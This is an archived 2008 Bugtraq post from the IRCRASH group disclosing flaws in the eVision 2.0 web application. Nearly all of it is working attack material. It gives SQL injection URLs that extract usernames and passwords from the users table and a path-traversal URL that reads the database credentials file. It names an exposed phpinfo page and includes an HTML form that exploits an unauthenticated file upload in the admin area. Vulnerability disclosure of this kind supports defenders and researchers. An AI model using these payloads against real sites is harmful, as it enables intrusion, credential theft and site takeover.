| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Fri, 1 Aug 2008 02:19:22 -0600 From: r3d.w0rm@...oo.com To: bugtraq@...urityfocus.com Subject: eVision 2.0 Sql Injection/Remote File Disclosure/Remote File Upload/IG ##################################################################################### #### eVision 2.0 Sql Injection/Remote File Disclosure/Remote File Upload/IG #### ##################################################################################### # # #AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) # #Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) # #Our Site : Http://IRCRASH.COM # #IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) # ##################################################################################### # # #Script Download : http://mesh.dl.sourceforge.net/sourceforge/e-vision/eVision-2.0.tar.gz # # #DORK : :( # # # ##################################################################################### # [Sql Injection] # # # #Blind : http://Site/print.php?id=1'+and+1=1/* # #http://Site/style.php?template=1&module='+union+select+concat_ws(0x7c,username,pass)+from+users/* #User : http://Site/iframe.php?field=username&module=users/* # #Pass : http://Site/iframe.php?field=pass&module=users/* # # [IG] # #http://Site/admin/phpinfo.php # # # # [Remote File Disclosure] # # # #http://Site/admin/show_img.php?type=text/plain&img=File # #Ex. http://Site/admin/show_img.php?type=text/plain&img=../vars.php [Get database user & pass] # # # [Remote File Upload] # #Exploit : # # # #<html> # #<!-- # #Powered by : IrCrash (R3d.W0rm(Sina Yazdanmehr)) # #Http://IrCrash.Com # #//--> # #<form action='http://[Site]/admin/x_image.php?type=background' method=post enctype=multipart/form-data> #<input type=file name='file_upload'> # #<input type=hidden name=insert value=1> # #<input type=hidden name=s_rc value='file://'> # #<input type=submit> # #</form> # #</html> # # # ##################################################################################### # Site : Http://IRCRASH.COM # ###################################### TNX GOD ######################################
Powered by blists - more mailing lists